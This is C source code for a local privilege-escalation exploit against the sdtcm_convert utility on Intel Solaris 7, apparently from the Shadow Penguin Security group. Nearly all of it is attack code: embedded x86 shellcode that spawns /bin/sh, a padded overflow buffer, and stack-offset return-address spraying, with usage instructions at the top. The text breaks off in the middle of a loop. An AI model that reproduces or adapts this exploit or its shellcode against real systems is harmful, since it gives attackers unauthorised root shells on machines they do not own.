/*============================================================================= sdtcm_convert Overflow Exploits( for Intel Solaris 7) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) [usage] % gcc ex_sdtcm_convert86.c (This example program) % a.out If no response, hit ctrl+c =============================================================================*/ #define ADJUST 1 #define OFFSET0 6268 #define OFFSET1 4400 #define LENGTH1 600 #define OFFSET2 5000 #define LENGTH2 3000 #define OFFSET3 6000 #define NOP 0x90 char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } unsigned long ret_adr; int i; main() { static char x[11000]; putenv("LANG="); memset(x,'a',10000); ret_adr=get_sp()-OFFSET0; for (i = 0; i < 5000 ; i+=4) { x[i+0]=ret_adr & 0xff; x[i+1]=(ret_adr >> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } ret_adr=get_sp()-11700; if ((ret_adr & 0xff )==0) ret_adr+=4; printf("Jumping Address = %lx\n",ret_adr); for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4) { x[i+0]=ret_adr & 0xff; x[i+1]=(ret_adr >> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } for (i = OFFSET2; i